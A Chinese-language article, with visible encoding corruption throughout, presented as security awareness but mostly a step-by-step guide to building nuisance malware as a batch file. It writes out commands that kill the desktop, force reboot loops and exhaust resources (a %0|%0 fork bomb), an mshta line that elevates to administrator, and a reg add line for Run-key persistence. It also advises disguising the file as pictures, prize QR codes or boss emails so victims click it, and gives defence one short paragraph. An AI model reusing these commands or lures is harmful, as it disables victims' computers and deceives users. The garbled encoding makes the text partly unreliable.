惡意批處理文件導(dǎo)致電腦黑屏、反復(fù)重啟、無響應(yīng)的原因分析及應(yīng)對思路

欒春偉

電腦"黑屏"、“反復(fù)重啟”、”死機(jī)無響應(yīng)”，成因多種多樣，處理方法也各不相同。很多時候，是惡意計算機(jī)程序?qū)е?，這里做個分析，提供一種解決思路。

一、有三條計算機(jī)命令，常被初級黑客用來制造小麻煩

1、電腦屏幕變?nèi)?/p>

taskkill -f -im explorer.exe

作用，關(guān)閉windows的圖形桌面。

2、在指定時間后，重新啟動電腦

shutdown -r -f -t 10

作用，在10秒鐘后，重新啟動windows電腦，強(qiáng)制執(zhí)行。把這個命令放入“開機(jī)啟動”中，可以實(shí)現(xiàn)開機(jī)后，反復(fù)重啟計算機(jī)的效果。推而廣之，也可以預(yù)定在某個約時間，執(zhí)行一系列的命令，不僅僅是重啟電腦，也可以備份重要數(shù)據(jù)到遠(yuǎn)程等等。

3、把計算機(jī)資源耗盡，導(dǎo)致死機(jī)無響應(yīng)

建立一個批處理文件中，輸入命令為

%0|%0

作用：批處理文件反復(fù)調(diào)用自己，每調(diào)用一次，占用一定資源，直到把計算機(jī)資源耗盡。

此外，常見的方法還有：建立一個批處理文件中，輸入命令為

：callCmdWindow

start cmd.exe

goto callCmdWindow

其作用是利用批處理文件，不斷彈出CMD命令窗口，直到將計算機(jī)資源耗盡。與%0|%0的思路相通，方法不同而已。

二、命令代碼如何被計算機(jī)自動執(zhí)行

1、利用windows自啟動項(xiàng)

windows注冊表Run鍵，是最易容想到的程序自啟動位置，讓電腦進(jìn)入widonws后，自動加載惡意代碼，只要把包含惡意代碼的文件，加入到Run即可。Run鍵有2個位置，分別是：

[HKEY_CURRENT_USER＼Software＼Microsoft＼Windows＼CurrentVersion＼Run]

[HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼Run]

2、把批處理文件放到自啟動項(xiàng)里

寫一個批處理文件。這個批處理文件的功能，不僅包括要執(zhí)行的“搗亂代碼”，還要包括，取得必要的程序執(zhí)行權(quán)限，修改注冊表，以及把自己加載到計算機(jī)的開機(jī)自動執(zhí)行程序名單里面等功能。

（1）新建一個批處理文件，

用windows自帶的記事本，新建一個批處理文件，例如，文件名是：我的批處理文件.cmd，windows中批處理文件后綴是 .bat或.cmd，后綴與具體windows 版本有關(guān)。

（2）獲取windows系統(tǒng)管理員權(quán)限

想要修改注冊表，比如RUN值等，都需要先拿到計算機(jī)的系統(tǒng)管理員權(quán)限，才能實(shí)施。在批處理文件中加入下列命令，取得管理員權(quán)限。

%1 mshta vbscript：CreateObject（"Shell.Application"）.ShellExecute（"cmd.exe"，"/c %～s0："，""，"runas"，1）（window.close）&&exit

（3）批處理文件將自身加入到windows自啟動項(xiàng)

在取得管理員權(quán)限后，在批處理文件中，寫入下列代碼，完成在注冊表中，把批處理文件自身加入到開機(jī)啟動的清單里面。這樣，以后，每次電腦開機(jī)，都后執(zhí)行這個批處理文件，也就是這個文件中的惡意代碼。

reg add "HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼run" /v 我的批處理文件 /d "%～dp0我的批處理文件.cmd" /f

（4）惡意代碼

選本文第一部分介紹的3個方法之一，放 與（略）

三、如何讓電腦用戶點(diǎn)擊這個批處理文件

完成上面的工作，一個簡單的黑客程序就寫好了。如何讓別人來執(zhí)行這個黑客程序呢。這就要用到社會工程學(xué)了，說白了，就是如何去忽悠人，想辦法讓人點(diǎn)擊這個批處理文件，一點(diǎn)擊，就可以在受害人的電腦上執(zhí)行了。常見的就是，把這個文件偽裝成吸睛美圖、掃二維碼中獎、老板郵件的附件等等。

四、如何防范

此種惡意代碼很易容在內(nèi)網(wǎng)中制造麻煩，因?yàn)檫@種惡意程序是自己編制的，用的也是正常的命令，沒有進(jìn)入計算機(jī)防病毒軟件的病毒庫，反毒軟件也很發(fā)現(xiàn)和防范這種代碼。因此，了解一些計算機(jī)安全基本常識必要，不點(diǎn)擊來源不明的文件和鏈接，了解并查看自己計算機(jī)的啟動項(xiàng)內(nèi)容，會清理不必要的啟動項(xiàng)，可以有效防范類似惡意代碼。

五、結(jié)束語

本文通過實(shí)例，簡明地介紹了計算機(jī)惡意程序制作及傳播的基本方法，有利于提高電腦用戶的網(wǎng)絡(luò)信息安全意識，提高防范黑客攻擊和計算機(jī)病毒入侵的能力，對網(wǎng)絡(luò)管理人員解決運(yùn)行中的問題，也有一定的幫助。